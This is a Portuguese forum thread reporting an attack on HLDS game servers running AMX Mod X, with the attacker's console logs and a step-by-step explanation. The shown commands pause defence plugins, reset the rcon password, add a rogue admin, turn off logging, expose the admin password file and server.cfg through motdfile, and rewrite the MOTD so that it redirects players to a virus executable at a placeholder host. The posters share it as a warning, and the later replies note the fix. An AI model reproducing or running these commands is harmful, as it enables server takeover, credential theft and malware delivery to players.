•  
     

Falha de segurança no HLDS

HDLS tem uma falha que permite um cara ver a senha de todos os admins e modificar arquivos


Logs do ataque:

amxx pause rcon_defencer.amxx
amxx pause watfstarter.amxx
amxx pause rcon
amxx pause rcon.amxx
amxx pause krond-functions.amxx
amxx pause forceds_cs_functions_lite_2.1
amxx pause krond
amxx pause krond.amxx
amxx pause function
rcon_password 198709871234l0l
rcon hostname -redacted-
hostname -redacted-
motdfile motd.txt
motd_write <meta http-equiv="Refresh" content="0; url="URl do vírus ou site dele">
amx_addadmin "STEAM_0:0:718437961" "abcdefghijklmnopqrstu"
log off
mp_logfile 0




amxx pause rcon_defencer.amxx
amxx pause watfstarter.amxx
amxx pause rcon.amxx
amxx pause krond-functions.amxx
amxx pause forceds_cs_functions_lite_2.1
mapchangecfgfile maps.cfg
rcon_password x
hostname "Hacked by http://URL DO SITE DELE"
motdfile motd.txt
amx_cvar "rcon_password" "x"
motd_write <meta http-equiv="Refresh" content="0; url=URl do vírus ou site dele">
amx_addadmin "STEAM_0:0:718437961" "abcdefghijklmnopqrstu"
log off
mp_logfile 0


amxx pause rcon_defencer.amxx
amxx pause watfstarter.amxx
amxx pause rcon.amxx
amxx pause krond-functions.amxx
amxx pause forceds_cs_functions_lite_2.1
mapchangecfgfile maps.cfg
rcon_password x
motdfile motd.txt
amx_cvar "rcon_password" "x"
motd_write <meta http-equiv="Refresh" content="0; url=http://IPdoVIRUS/csupdate.exe">
log off
mp_logfile 0



amxx pause rcon_defencer.amxx
amxx pause watfstarter.amxx
amxx pause rcon
amxx pause rcon.amxx
amxx pause krond-functions.amxx
amxx pause forceds_cs_functions_lite_2.1
amxx pause krond
amxx pause krond.amxx
amxx pause function
rcon_password spankylovesyou
rcon hostname URL DO SITE DELE
hostname URL DO SITE DELE
motdfile motd.txt
motd_write <meta http-equiv="Refresh" content="0; url=http://URL DO SITE VIRUS">




COM_WriteFile: addons/metamod/exec.cfg

Ignoring non-customization file upload of addons\metamod\exec.cfg

COM_WriteFile: addons/amxmodx/configs/maps/31hp_knife_pro.cfg

Ignoring non-customization file upload of addons\amxmodx\configs\maps\31hp_knife_pro.cfg

COM_WriteFile: addons/amxmodx/configs/maps/35hp.cfg

Ignoring non-customization file upload of addons\amxmodx\configs\maps\35hp.cfg

COM_WriteFile: addons/amxmodx/configs/maps/35hp_alone.cfg

Ignoring non-customization file upload of addons\amxmodx\configs\maps\35hp_alone.cfg

COM_WriteFile: addons/amxmodx/configs/maps/hnsm_nemesis.cfg

Ignoring non-customization file upload of addons\amxmodx\configs\maps\hnsm_nemesis.cfg

COM_WriteFile: addons/amxmodx/configs/maps/as_oilrig.cfg

Ignoring non-customization file upload of addons\amxmodx\configs\maps\as_oilrig.cfg

Can't download addons\amxmodx\configs\maps\awp_bycastor32.cfg, already exists

Ignoring non-customization file upload of addons\amxmodx\configs\maps\awp_bycastor32.cfg

COM_WriteFile: addons/amxmodx/configs/maps/awp_india.cfg

Ignoring non-customization file upload of addons\amxmodx\configs\maps\awp_india.cfg

COM_WriteFile: addons/amxmodx/configs/maps/awp_mie.cfg

Ignoring non-customization file upload of addons\amxmodx\configs\maps\awp_mie.cfg

COM_WriteFile: addons/amxmodx/configs/maps/c21_kitty_b1.cfg

Ignoring non-customization file upload of addons\amxmodx\configs\maps\c21_kitty_b1.cfg

COM_WriteFile: addons/amxmodx/configs/maps/awp_rooft0ps_remake.cfg

Ignoring non-customization file upload of addons\amxmodx\configs\maps\awp_rooft0ps_remake.cfg

COM_WriteFile: addons/amxmodx/configs/maps/awp_rooftops.cfg

Ignoring non-customization file upload of addons\amxmodx\configs\maps\awp_rooftops.cfg
 
O invasor primeiro pausa os plugins de defesa e depois usa isso:

Usa o comando:


Código: Selecionar todos

amx_rcon rcon_password senha

ou

Código: Selecionar todos

amx_cvar rcon_password senha


Depois usa:

Código: Selecionar todos

rcon_password "senha que ele colocou no server"


Para pegar as senhas de todos admins ele usa:

Código: Selecionar todos


rcon motdfile addons/amxmodx/configs/users.ini
reconnect




Para colocar o site dele ou uma url de um vírus no motd.txt, ele usa:

Código: Selecionar todos

motd_write <META HTTP-EQUIV=Refresh CONTENT="0 URL=http://IP DO VIRUS/csupdate.exe">



Para ver as configs do arquivo server.cfg ele usa:

Código: Selecionar todos

rcon motdfile server.cfg 
reconnect
 
Nossa!!!! Anderson aqui toda vez que eu entro no server dá isso:
vírus.jpg


O mesmo csupdate.exe que vc citou no log. Ainda bem que o antivírus bloqueia.

Pela Steam ou non-Steam ele pede para baixar o vírus!!!!
 
Ajeitei o bug
 
Aff, a concorrencia de servidores ta ficando feio hein.